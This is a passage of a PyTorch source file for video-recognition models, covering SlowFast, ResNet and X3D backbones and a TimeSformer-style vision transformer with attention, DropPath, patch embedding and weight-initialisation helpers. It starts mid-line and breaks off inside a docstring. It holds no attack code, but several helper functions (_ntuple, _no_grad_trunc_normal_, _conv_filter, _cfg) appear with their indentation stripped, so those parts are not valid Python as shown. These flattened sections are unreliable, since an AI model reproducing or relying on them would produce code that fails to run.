            # NameError whenever detection was enabled.
            head = head_helper.ResNetRoIHead(dim_in=[width_per_group * 32, width_per_group * 32 // cfg.SLOWFAST.BETA_INV], num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[[cfg.DATA.NUM_FRAMES // cfg.SLOWFAST.ALPHA // pool_size[0][0], 1, 1], [cfg.DATA.NUM_FRAMES // pool_size[1][0], 1, 1]], resolution=[[cfg.DETECTION.ROI_XFORM_RESOLUTION] * 2] * 2, scale_factor=[cfg.DETECTION.SPATIAL_SCALE_FACTOR] * 2, dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT, aligned=cfg.DETECTION.ALIGNED)
        else:
            head = head_helper.ResNetBasicHead(dim_in=[width_per_group * 32, width_per_group * 32 // cfg.SLOWFAST.BETA_INV], num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[None, None] if cfg.MULTIGRID.SHORT_CYCLE else [[cfg.DATA.NUM_FRAMES // cfg.SLOWFAST.ALPHA // pool_size[0][0], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[0][1], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[0][2]], [cfg.DATA.NUM_FRAMES // pool_size[1][0], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[1][1], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[1][2]]], dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT)
        # Register the head under a task-specific name; forward fetches it via
        # getattr(self, self.head_name).
        self.head_name = 'head{}'.format(cfg.TASK)
        self.add_module(self.head_name, head)

    def forward(self, x, bboxes=None):
        # x: [slow_clip, fast_clip]; bboxes is only used by the detection head.
        x = self.s1(x)
        x = self.s1_fuse(x)
        x = self.s2(x)
        x = self.s2_fuse(x)
        for pathway in range(self.num_pathways):
            pool = getattr(self, 'pathway{}_pool'.format(pathway))
            x[pathway] = pool(x[pathway])
        x = self.s3(x)
        x = self.s3_fuse(x)
        x = self.s4(x)
        x = self.s4_fuse(x)
        x = self.s5(x)
        head = getattr(self, self.head_name)
        if self.enable_detection:
            x = head(x, bboxes)
        else:
            x = head(x)
        return x
class ResNet(nn.Module):
    """
    ResNet model builder. It builds a ResNet like network backbone without
    lateral connection (C2D, I3D, Slow).
    Christoph Feichtenhofer, Haoqi Fan, Jitendra Malik, and Kaiming He.
    "SlowFast networks for video recognition."
    https://arxiv.org/pdf/1812.03982.pdf
    Xiaolong Wang, Ross Girshick, Abhinav Gupta, and Kaiming He.
    "Non-local neural networks."
    https://arxiv.org/pdf/1711.07971.pdf
    """

    def __init__(self, cfg):
        """
        The `__init__` method of any subclass should also contain these
        arguments.
        Args:
            cfg (CfgNode): model building configs, details are in the
                comments of the config file.
        """
        super(ResNet, self).__init__()
        self.norm_module = get_norm(cfg)
        self.enable_detection = cfg.DETECTION.ENABLE
        self.num_pathways = 1
        self._construct_network(cfg)
        init_helper.init_weights(self, cfg.MODEL.FC_INIT_STD, cfg.RESNET.ZERO_INIT_FINAL_BN)

    def _construct_network(self, cfg):
        """
        Builds a single pathway ResNet model.
        Args:
            cfg (CfgNode): model building configs, details are in the
                comments of the config file.
        """
        assert cfg.MODEL.ARCH in _POOL1.keys()
        pool_size = _POOL1[cfg.MODEL.ARCH]
        assert len({len(pool_size), self.num_pathways}) == 1
        assert cfg.RESNET.DEPTH in _MODEL_STAGE_DEPTH.keys()
        d2, d3, d4, d5 = _MODEL_STAGE_DEPTH[cfg.RESNET.DEPTH]
        num_groups = cfg.RESNET.NUM_GROUPS
        width_per_group = cfg.RESNET.WIDTH_PER_GROUP
        dim_inner = num_groups * width_per_group
        temp_kernel = _TEMPORAL_KERNEL_BASIS[cfg.MODEL.ARCH]
        # Stem followed by the four residual stages (res2..res5).
        self.s1 = stem_helper.VideoModelStem(dim_in=cfg.DATA.INPUT_CHANNEL_NUM, dim_out=[width_per_group], kernel=[temp_kernel[0][0] + [7, 7]], stride=[[1, 2, 2]], padding=[[temp_kernel[0][0][0] // 2, 3, 3]], norm_module=self.norm_module)
        self.s2 = resnet_helper.ResStage(dim_in=[width_per_group], dim_out=[width_per_group * 4], dim_inner=[dim_inner], temp_kernel_sizes=temp_kernel[1], stride=cfg.RESNET.SPATIAL_STRIDES[0], num_blocks=[d2], num_groups=[num_groups], num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[0], nonlocal_inds=cfg.NONLOCAL.LOCATION[0], nonlocal_group=cfg.NONLOCAL.GROUP[0], nonlocal_pool=cfg.NONLOCAL.POOL[0], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, inplace_relu=cfg.RESNET.INPLACE_RELU, dilation=cfg.RESNET.SPATIAL_DILATIONS[0], norm_module=self.norm_module)
        for pathway in range(self.num_pathways):
            pool = nn.MaxPool3d(kernel_size=pool_size[pathway], stride=pool_size[pathway], padding=[0, 0, 0])
            self.add_module('pathway{}_pool'.format(pathway), pool)
        self.s3 = resnet_helper.ResStage(dim_in=[width_per_group * 4], dim_out=[width_per_group * 8], dim_inner=[dim_inner * 2], temp_kernel_sizes=temp_kernel[2], stride=cfg.RESNET.SPATIAL_STRIDES[1], num_blocks=[d3], num_groups=[num_groups], num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[1], nonlocal_inds=cfg.NONLOCAL.LOCATION[1], nonlocal_group=cfg.NONLOCAL.GROUP[1], nonlocal_pool=cfg.NONLOCAL.POOL[1], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, inplace_relu=cfg.RESNET.INPLACE_RELU, dilation=cfg.RESNET.SPATIAL_DILATIONS[1], norm_module=self.norm_module)
        self.s4 = resnet_helper.ResStage(dim_in=[width_per_group * 8], dim_out=[width_per_group * 16], dim_inner=[dim_inner * 4], temp_kernel_sizes=temp_kernel[3], stride=cfg.RESNET.SPATIAL_STRIDES[2], num_blocks=[d4], num_groups=[num_groups], num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[2], nonlocal_inds=cfg.NONLOCAL.LOCATION[2], nonlocal_group=cfg.NONLOCAL.GROUP[2], nonlocal_pool=cfg.NONLOCAL.POOL[2], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, inplace_relu=cfg.RESNET.INPLACE_RELU, dilation=cfg.RESNET.SPATIAL_DILATIONS[2], norm_module=self.norm_module)
        self.s5 = resnet_helper.ResStage(dim_in=[width_per_group * 16], dim_out=[width_per_group * 32], dim_inner=[dim_inner * 8], temp_kernel_sizes=temp_kernel[4], stride=cfg.RESNET.SPATIAL_STRIDES[3], num_blocks=[d5], num_groups=[num_groups], num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[3], nonlocal_inds=cfg.NONLOCAL.LOCATION[3], nonlocal_group=cfg.NONLOCAL.GROUP[3], nonlocal_pool=cfg.NONLOCAL.POOL[3], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, inplace_relu=cfg.RESNET.INPLACE_RELU, dilation=cfg.RESNET.SPATIAL_DILATIONS[3], norm_module=self.norm_module)
        if self.enable_detection:
            # BUGFIX: bind the head to the local ``head`` (previously
            # ``self.head``), otherwise the unconditional
            # ``self.add_module(self.head_name, head)`` below raised a
            # NameError whenever detection was enabled.
            head = head_helper.ResNetRoIHead(dim_in=[width_per_group * 32], num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[[cfg.DATA.NUM_FRAMES // pool_size[0][0], 1, 1]], resolution=[[cfg.DETECTION.ROI_XFORM_RESOLUTION] * 2], scale_factor=[cfg.DETECTION.SPATIAL_SCALE_FACTOR], dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT, aligned=cfg.DETECTION.ALIGNED)
        else:
            head = head_helper.ResNetBasicHead(dim_in=[width_per_group * 32], num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[None, None] if cfg.MULTIGRID.SHORT_CYCLE else [[cfg.DATA.NUM_FRAMES // pool_size[0][0], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[0][1], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[0][2]]], dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT)
        # Register the head under a task-specific name; forward fetches it via
        # getattr(self, self.head_name).
        self.head_name = 'head{}'.format(cfg.TASK)
        self.add_module(self.head_name, head)

    def forward(self, x, bboxes=None):
        # x: single-element list holding the input clip; bboxes is only used
        # by the detection head.
        x = self.s1(x)
        x = self.s2(x)
        for pathway in range(self.num_pathways):
            pool = getattr(self, 'pathway{}_pool'.format(pathway))
            x[pathway] = pool(x[pathway])
        x = self.s3(x)
        x = self.s4(x)
        x = self.s5(x)
        head = getattr(self, self.head_name)
        if self.enable_detection:
            x = head(x, bboxes)
        else:
            x = head(x)
        return x
class X3D(nn.Module):
    """
    X3D model builder. It builds a X3D network backbone, which is a ResNet.
    Christoph Feichtenhofer.
    "X3D: Expanding Architectures for Efficient Video Recognition."
    https://arxiv.org/abs/2004.04730
    """

    def __init__(self, cfg):
        """
        The `__init__` method of any subclass should also contain these
        arguments.
        Args:
            cfg (CfgNode): model building configs, details are in the
                comments of the config file.
        """
        super(X3D, self).__init__()
        self.norm_module = get_norm(cfg)
        self.enable_detection = cfg.DETECTION.ENABLE
        self.num_pathways = 1
        exp_stage = 2.0
        self.dim_c1 = cfg.X3D.DIM_C1
        # Stage widths double (exp_stage) from res2 to res5, rounded to a
        # multiple of 8.
        self.dim_res2 = self._round_width(self.dim_c1, exp_stage, divisor=8) if cfg.X3D.SCALE_RES2 else self.dim_c1
        self.dim_res3 = self._round_width(self.dim_res2, exp_stage, divisor=8)
        self.dim_res4 = self._round_width(self.dim_res3, exp_stage, divisor=8)
        self.dim_res5 = self._round_width(self.dim_res4, exp_stage, divisor=8)
        # Per stage: [base block count, base width, spatial stride].
        self.block_basis = [[1, self.dim_res2, 2], [2, self.dim_res3, 2], [5, self.dim_res4, 2], [3, self.dim_res5, 2]]
        self._construct_network(cfg)
        init_helper.init_weights(self, cfg.MODEL.FC_INIT_STD, cfg.RESNET.ZERO_INIT_FINAL_BN)

    def _round_width(self, width, multiplier, min_depth=8, divisor=8):
        """Round width of filters based on width multiplier."""
        if not multiplier:
            return width
        width *= multiplier
        min_depth = min_depth or divisor
        new_filters = max(min_depth, int(width + divisor / 2) // divisor * divisor)
        # Make sure rounding down did not lose more than 10% of the width.
        if new_filters < 0.9 * width:
            new_filters += divisor
        return int(new_filters)

    def _round_repeats(self, repeats, multiplier):
        """Round number of layers based on depth multiplier."""
        if not multiplier:
            return repeats
        return int(math.ceil(multiplier * repeats))

    def _construct_network(self, cfg):
        """
        Builds a single pathway X3D model.
        Args:
            cfg (CfgNode): model building configs, details are in the
                comments of the config file.
        """
        assert cfg.MODEL.ARCH in _POOL1.keys()
        assert cfg.RESNET.DEPTH in _MODEL_STAGE_DEPTH.keys()
        # NOTE: stage depths come from self.block_basis below; d2..d5 are not
        # used by X3D but the depth assert keeps configs consistent.
        d2, d3, d4, d5 = _MODEL_STAGE_DEPTH[cfg.RESNET.DEPTH]
        num_groups = cfg.RESNET.NUM_GROUPS
        width_per_group = cfg.RESNET.WIDTH_PER_GROUP
        dim_inner = num_groups * width_per_group
        w_mul = cfg.X3D.WIDTH_FACTOR
        d_mul = cfg.X3D.DEPTH_FACTOR
        dim_res1 = self._round_width(self.dim_c1, w_mul)
        temp_kernel = _TEMPORAL_KERNEL_BASIS[cfg.MODEL.ARCH]
        self.s1 = stem_helper.VideoModelStem(dim_in=cfg.DATA.INPUT_CHANNEL_NUM, dim_out=[dim_res1], kernel=[temp_kernel[0][0] + [3, 3]], stride=[[1, 2, 2]], padding=[[temp_kernel[0][0][0] // 2, 1, 1]], norm_module=self.norm_module, stem_func_name='x3d_stem')
        dim_in = dim_res1
        for stage, block in enumerate(self.block_basis):
            # Expand width/depth per the X3D multipliers for each stage.
            dim_out = self._round_width(block[1], w_mul)
            dim_inner = int(cfg.X3D.BOTTLENECK_FACTOR * dim_out)
            n_rep = self._round_repeats(block[0], d_mul)
            prefix = 's{}'.format(stage + 2)
            s = resnet_helper.ResStage(dim_in=[dim_in], dim_out=[dim_out], dim_inner=[dim_inner], temp_kernel_sizes=temp_kernel[1], stride=[block[2]], num_blocks=[n_rep], num_groups=[dim_inner] if cfg.X3D.CHANNELWISE_3x3x3 else [num_groups], num_block_temp_kernel=[n_rep], nonlocal_inds=cfg.NONLOCAL.LOCATION[0], nonlocal_group=cfg.NONLOCAL.GROUP[0], nonlocal_pool=cfg.NONLOCAL.POOL[0], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, norm_module=self.norm_module, dilation=cfg.RESNET.SPATIAL_DILATIONS[stage], drop_connect_rate=cfg.MODEL.DROPCONNECT_RATE * (stage + 2) / (len(self.block_basis) + 1))
            dim_in = dim_out
            self.add_module(prefix, s)
        if self.enable_detection:
            # BUGFIX: the original evaluated the bare ``NotImplementedError``
            # class (a no-op) and silently built a model with no head.
            # Detection is unsupported for X3D, so fail loudly instead.
            raise NotImplementedError('Detection is not supported for X3D.')
        else:
            spat_sz = int(math.ceil(cfg.DATA.TRAIN_CROP_SIZE / 32.0))
            self.head = head_helper.X3DHead(dim_in=dim_out, dim_inner=dim_inner, dim_out=cfg.X3D.DIM_C5, num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[cfg.DATA.NUM_FRAMES, spat_sz, spat_sz], dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT, bn_lin5_on=cfg.X3D.BN_LIN5)

    def forward(self, x, bboxes=None):
        # bboxes is accepted for interface parity with other builders but is
        # unused (detection is not supported). Modules run in registration
        # order: stem, res stages, head.
        for module in self.children():
            x = module(x)
        return x
class Mlp(nn.Module):
    """Two-layer MLP: Linear -> activation -> dropout -> Linear -> dropout."""

    def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.0):
        super().__init__()
        # Hidden and output widths default to the input width.
        hidden = hidden_features or in_features
        out = out_features or in_features
        self.fc1 = nn.Linear(in_features, hidden)
        self.act = act_layer()
        self.fc2 = nn.Linear(hidden, out)
        # A single dropout module is applied after both layers.
        self.drop = nn.Dropout(drop)

    def forward(self, x):
        return self.drop(self.fc2(self.drop(self.act(self.fc1(x)))))
class Attention(nn.Module):
    """Multi-head self-attention, optionally without qkv/output projections."""

    def __init__(self, dim, num_heads=8, qkv_bias=False, qk_scale=None, attn_drop=0.0, proj_drop=0.0, with_qkv=True):
        super().__init__()
        self.num_heads = num_heads
        head_dim = dim // num_heads
        # Default scaling is 1/sqrt(head_dim); overridable via qk_scale.
        self.scale = qk_scale or head_dim ** -0.5
        self.with_qkv = with_qkv
        if self.with_qkv:
            self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)
            self.proj = nn.Linear(dim, dim)
            self.proj_drop = nn.Dropout(proj_drop)
        self.attn_drop = nn.Dropout(attn_drop)

    def forward(self, x):
        B, N, C = x.shape
        heads = self.num_heads
        if self.with_qkv:
            # Project to q, k, v laid out as (3, B, heads, N, C // heads).
            qkv = self.qkv(x).reshape(B, N, 3, heads, C // heads).permute(2, 0, 3, 1, 4)
            q, k, v = qkv[0], qkv[1], qkv[2]
        else:
            # No projection: the (head-split) input serves as q, k and v.
            shared = x.reshape(B, N, heads, C // heads).permute(0, 2, 1, 3)
            q = k = v = shared
        scores = q @ k.transpose(-2, -1) * self.scale
        attn = self.attn_drop(scores.softmax(dim=-1))
        out = (attn @ v).transpose(1, 2).reshape(B, N, C)
        if self.with_qkv:
            out = self.proj_drop(self.proj(out))
        return out
def drop_path(x, drop_prob: float=0.0, training: bool=False):
    """Per-sample stochastic depth (DropPath) for residual main paths.

    Zeroes entire samples of the batch with probability ``drop_prob`` and
    rescales the survivors by ``1 / (1 - drop_prob)`` so the expected
    activation is unchanged. Identity when not training or when
    ``drop_prob`` is zero. Same idea as EfficientNet's "DropConnect"; the
    name "drop path" avoids confusion with the Wan et al. DropConnect —
    see https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956.
    """
    if drop_prob == 0.0 or not training:
        return x
    keep_prob = 1 - drop_prob
    # One Bernoulli draw per sample; broadcast across remaining dims.
    mask_shape = (x.shape[0],) + (1,) * (x.ndim - 1)
    mask = keep_prob + torch.rand(mask_shape, dtype=x.dtype, device=x.device)
    mask.floor_()  # 1 with probability keep_prob, else 0
    return x.div(keep_prob) * mask
class DropPath(nn.Module):
    """Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
    """
    def __init__(self, drop_prob=None):
        # drop_prob: per-sample drop probability, passed straight through to
        # drop_path(). NOTE(review): a literal None would fail inside
        # drop_path when training (1 - None); callers appear to always pass
        # a float — confirm.
        super(DropPath, self).__init__()
        self.drop_prob = drop_prob
    def forward(self, x):
        # Stochastic depth is only active in training mode; identity at eval.
        return drop_path(x, self.drop_prob, self.training)
class Block(nn.Module):
    """Transformer block with configurable space/time attention (TimeSformer-style)."""
    def __init__(self, dim, num_heads, mlp_ratio=4.0, qkv_bias=False, qk_scale=None, drop=0.0, attn_drop=0.0, drop_path=0.1, act_layer=nn.GELU, norm_layer=nn.LayerNorm, attention_type='divided_space_time'):
        super().__init__()
        self.attention_type = attention_type
        assert attention_type in ['divided_space_time', 'space_only', 'joint_space_time']
        self.norm1 = norm_layer(dim)
        self.attn = Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=drop)
        if self.attention_type == 'divided_space_time':
            # Separate temporal-attention branch with its own pre-norm and a
            # linear projection applied to the temporal residual.
            self.temporal_norm1 = norm_layer(dim)
            self.temporal_attn = Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=drop)
            self.temporal_fc = nn.Linear(dim, dim)
        self.drop_path = DropPath(drop_path) if drop_path > 0.0 else nn.Identity()
        self.norm2 = norm_layer(dim)
        mlp_hidden_dim = int(dim * mlp_ratio)
        self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop)
    def forward(self, x, B, T, W):
        # x: (B, 1 + H*W*T, dim) token sequence with a leading cls token;
        # B/T/W describe the original batch/time/width token layout.
        num_spatial_tokens = (x.size(1) - 1) // T
        H = num_spatial_tokens // W
        if self.attention_type in ['space_only', 'joint_space_time']:
            # Standard pre-norm transformer block over all tokens jointly.
            x = x + self.drop_path(self.attn(self.norm1(x)))
            x = x + self.drop_path(self.mlp(self.norm2(x)))
            return x
        elif self.attention_type == 'divided_space_time':
            # Temporal attention: attend across time at each spatial location.
            xt = x[:, 1:, :]
            xt = rearrange(xt, 'b (h w t) m -> (b h w) t m', b=B, h=H, w=W, t=T)
            res_temporal = self.drop_path(self.temporal_attn(self.temporal_norm1(xt)))
            res_temporal = rearrange(res_temporal, '(b h w) t m -> b (h w t) m', b=B, h=H, w=W, t=T)
            res_temporal = self.temporal_fc(res_temporal)
            xt = x[:, 1:, :] + res_temporal
            # Spatial attention: the cls token is replicated once per frame so
            # each frame attends over its own patches plus a cls copy.
            init_cls_token = x[:, 0, :].unsqueeze(1)
            cls_token = init_cls_token.repeat(1, T, 1)
            cls_token = rearrange(cls_token, 'b t m -> (b t) m', b=B, t=T).unsqueeze(1)
            xs = xt
            xs = rearrange(xs, 'b (h w t) m -> (b t) (h w) m', b=B, h=H, w=W, t=T)
            xs = torch.cat((cls_token, xs), 1)
            res_spatial = self.drop_path(self.attn(self.norm1(xs)))
            # Average the per-frame cls outputs back into a single cls token.
            cls_token = res_spatial[:, 0, :]
            cls_token = rearrange(cls_token, '(b t) m -> b t m', b=B, t=T)
            cls_token = torch.mean(cls_token, 1, True)
            res_spatial = res_spatial[:, 1:, :]
            res_spatial = rearrange(res_spatial, '(b t) (h w) m -> b (h w t) m', b=B, h=H, w=W, t=T)
            res = res_spatial
            x = xt
            # Residual merge of cls + patch tokens, then the MLP sub-block.
            x = torch.cat((init_cls_token, x), 1) + torch.cat((cls_token, res), 1)
            x = x + self.drop_path(self.mlp(self.norm2(x)))
            return x
def _ntuple(n):
def parse(x):
if isinstance(x, container_abcs.Iterable):
return x
return tuple(repeat(x, n))
return parse
to_2tuple = _ntuple(2)
class PatchEmbed(nn.Module):
    """Split video frames into non-overlapping patches and embed them.

    Each frame of size ``img_size`` is cut into ``patch_size`` patches,
    every patch being projected to ``embed_dim`` channels by a strided
    convolution.
    """
    def __init__(self, img_size=224, patch_size=16, in_chans=3, embed_dim=768):
        super().__init__()
        img_size = to_2tuple(img_size)
        patch_size = to_2tuple(patch_size)
        grid_h = img_size[0] // patch_size[0]
        grid_w = img_size[1] // patch_size[1]
        self.img_size = img_size
        self.patch_size = patch_size
        self.num_patches = grid_w * grid_h
        self.proj = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=patch_size)
    def forward(self, x):
        """Return (tokens of shape ((B*T), N, embed_dim), T, patch-grid width)."""
        B, C, T, H, W = x.shape
        # Fold time into the batch axis so the 2D conv sees single frames.
        x = rearrange(x, 'b c t h w -> (b t) c h w')
        x = self.proj(x)
        W = x.size(-1)
        x = x.flatten(2).transpose(1, 2)
        return x, T, W
def _no_grad_trunc_normal_(tensor, mean, std, a, b):
def norm_cdf(x):
return (1.0 + math.erf(x / math.sqrt(2.0))) / 2.0
if mean < a - 2 * std or mean > b + 2 * std:
warnings.warn('mean is more than 2 std from [a, b] in nn.init.trunc_normal_. The distribution of values may be incorrect.', stacklevel=2)
with torch.no_grad():
l = norm_cdf((a - mean) / std)
u = norm_cdf((b - mean) / std)
tensor.uniform_(2 * l - 1, 2 * u - 1)
tensor.erfinv_()
tensor.mul_(std * math.sqrt(2.0))
tensor.add_(mean)
tensor.clamp_(min=a, max=b)
return tensor
def trunc_normal_(tensor, mean=0.0, std=1.0, a=-2.0, b=2.0):
    r"""Initialise `tensor` in place from a truncated normal distribution.

    Values are drawn from :math:`\mathcal{N}(\text{mean}, \text{std}^2)`
    restricted to ``[a, b]``; values outside the interval are redrawn.
    Sampling works best when ``a <= mean <= b``.

    Args:
        tensor: an n-dimensional `torch.Tensor`
        mean: centre of the underlying normal distribution
        std: standard deviation of the underlying normal distribution
        a: lower truncation bound
        b: upper truncation bound

    Returns:
        The same tensor, filled in place.

    Examples:
        >>> w = torch.empty(3, 5)
        >>> trunc_normal_(w)
    """
    return _no_grad_trunc_normal_(tensor, mean, std, a, b)
class VisionTransformer(nn.Module):
    """ Vision Transformer

    TimeSformer-style video transformer: patch-embeds frames, adds a
    spatial position embedding (plus a temporal one unless
    `attention_type == 'space_only'`), runs `depth` encoder blocks and
    classifies from the CLS token.
    """
    def __init__(self, img_size=224, patch_size=16, in_chans=3, num_classes=1000, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4.0, qkv_bias=False, qk_scale=None, drop_rate=0.0, attn_drop_rate=0.0, drop_path_rate=0.1, hybrid_backbone=None, norm_layer=nn.LayerNorm, num_frames=8, attention_type='divided_space_time', dropout=0.0):
        super().__init__()
        self.attention_type = attention_type
        self.depth = depth
        self.dropout = nn.Dropout(dropout)
        self.num_classes = num_classes
        # num_features kept as an alias for consistency with other models.
        self.num_features = self.embed_dim = embed_dim
        self.patch_embed = PatchEmbed(img_size=img_size, patch_size=patch_size, in_chans=in_chans, embed_dim=embed_dim)
        num_patches = self.patch_embed.num_patches
        self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))
        self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + 1, embed_dim))
        self.pos_drop = nn.Dropout(p=drop_rate)
        if self.attention_type != 'space_only':
            # Learned temporal position embedding, one slot per frame.
            self.time_embed = nn.Parameter(torch.zeros(1, num_frames, embed_dim))
            self.time_drop = nn.Dropout(p=drop_rate)
        # Stochastic depth: drop-path rate grows linearly with block index.
        dpr = [x.item() for x in torch.linspace(0, drop_path_rate, self.depth)]
        self.blocks = nn.ModuleList([Block(dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale, drop=drop_rate, attn_drop=attn_drop_rate, drop_path=dpr[i], norm_layer=norm_layer, attention_type=self.attention_type) for i in range(self.depth)])
        self.norm = norm_layer(embed_dim)
        self.head = nn.Linear(embed_dim, num_classes) if num_classes > 0 else nn.Identity()
        trunc_normal_(self.pos_embed, std=0.02)
        trunc_normal_(self.cls_token, std=0.02)
        self.apply(self._init_weights)
        if self.attention_type == 'divided_space_time':
            # Zero-init temporal projections of every block except the first
            # so the temporal branch starts as a no-op after adaptation.
            i = 0
            for m in self.blocks.modules():
                m_str = str(m)
                if 'Block' in m_str:
                    if i > 0:
                        nn.init.constant_(m.temporal_fc.weight, 0)
                        nn.init.constant_(m.temporal_fc.bias, 0)
                    i += 1
    def _init_weights(self, m):
        # Truncated-normal linear weights; LayerNorm initialised to identity.
        if isinstance(m, nn.Linear):
            trunc_normal_(m.weight, std=0.02)
            if isinstance(m, nn.Linear) and m.bias is not None:
                nn.init.constant_(m.bias, 0)
        elif isinstance(m, nn.LayerNorm):
            nn.init.constant_(m.bias, 0)
            nn.init.constant_(m.weight, 1.0)
    @torch.jit.ignore
    def no_weight_decay(self):
        # Embedding and CLS parameters are exempted from weight decay.
        return {'pos_embed', 'cls_token', 'time_embed'}
    def get_classifier(self):
        """Return the classification head module."""
        return self.head
    def reset_classifier(self, num_classes, global_pool=''):
        """Replace the classification head with one for `num_classes` outputs."""
        self.num_classes = num_classes
        self.head = nn.Linear(self.embed_dim, num_classes) if num_classes > 0 else nn.Identity()
    def forward_features(self, x):
        """Encode a clip batch (B, C, T, H, W) into a CLS feature (B, embed_dim)."""
        B = x.shape[0]
        x, T, W = self.patch_embed(x)
        cls_tokens = self.cls_token.expand(x.size(0), -1, -1)
        x = torch.cat((cls_tokens, x), dim=1)
        if x.size(1) != self.pos_embed.size(1):
            # Input resolution differs from training: resize the spatial
            # position-embedding grid (the CLS slot is handled separately).
            pos_embed = self.pos_embed
            cls_pos_embed = pos_embed[0, 0, :].unsqueeze(0).unsqueeze(1)
            other_pos_embed = pos_embed[0, 1:, :].unsqueeze(0).transpose(1, 2)
            P = int(other_pos_embed.size(2) ** 0.5)
            H = x.size(1) // W
            other_pos_embed = other_pos_embed.reshape(1, x.size(2), P, P)
            new_pos_embed = F.interpolate(other_pos_embed, size=(H, W), mode='nearest')
            new_pos_embed = new_pos_embed.flatten(2)
            new_pos_embed = new_pos_embed.transpose(1, 2)
            new_pos_embed = torch.cat((cls_pos_embed, new_pos_embed), 1)
            x = x + new_pos_embed
        else:
            x = x + self.pos_embed
        x = self.pos_drop(x)
        if self.attention_type != 'space_only':
            # NOTE(review): rows are laid out (b t) along the batch axis, so
            # x[:B] picks the first B CLS rows; this yields one CLS per clip
            # only because all CLS rows are identical here -- confirm before
            # changing the token layout.
            cls_tokens = x[:B, 0, :].unsqueeze(1)
            x = x[:, 1:]
            x = rearrange(x, '(b t) n m -> (b n) t m', b=B, t=T)
            if T != self.time_embed.size(1):
                # Resize the temporal embedding to the actual frame count.
                time_embed = self.time_embed.transpose(1, 2)
                new_time_embed = F.interpolate(time_embed, size=T, mode='nearest')
                new_time_embed = new_time_embed.transpose(1, 2)
                x = x + new_time_embed
            else:
                x = x + self.time_embed
            x = self.time_drop(x)
            x = rearrange(x, '(b n) t m -> b (n t) m', b=B, t=T)
            x = torch.cat((cls_tokens, x), dim=1)
        for blk in self.blocks:
            x = blk(x, B, T, W)
        if self.attention_type == 'space_only':
            # Average frame-level features over the time axis.
            x = rearrange(x, '(b t) n m -> b t n m', b=B, t=T)
            x = torch.mean(x, 1)
        x = self.norm(x)
        return x[:, 0]
    def forward(self, x):
        x = self.forward_features(x)
        x = self.head(x)
        return x
def _conv_filter(state_dict, patch_size=16):
""" convert patch embedding weight from manual patchify + linear proj to conv"""
out_dict = {}
for k, v in state_dict.items():
if 'patch_embed.proj.weight' in k:
if v.shape[-1] != patch_size:
patch_size = v.shape[-1]
v = v.reshape((v.shape[0], 3, patch_size, patch_size))
out_dict[k] = v
return out_dict
IMAGENET_DEFAULT_MEAN = 0.485, 0.456, 0.406
IMAGENET_DEFAULT_STD = 0.229, 0.224, 0.225
def _cfg(url='', **kwargs):
return {'url': url, 'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': None, 'crop_pct': 0.9, 'interpolation': 'bicubic', 'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD, 'first_conv': 'patch_embed.proj', 'classifier': 'head', **kwargs}
# Registry of known pretrained configurations, keyed by model name.
default_cfgs = {'vit_base_patch16_224': _cfg(url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-vitjx/jx_vit_base_p16_224-80ecf9dd.pth', mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))}
# Module-level logger for checkpoint-loading diagnostics.
_logger = logging.getLogger(__name__)
def load_state_dict(checkpoint_path, use_ema=False):
    """Load a model state dict from `checkpoint_path`.

    Handles three checkpoint layouts: a raw state dict, a dict with a
    'state_dict' (or, when `use_ema` is set, 'state_dict_ema') entry,
    and a dict with a 'model_state' entry.  'module.' / 'model.'
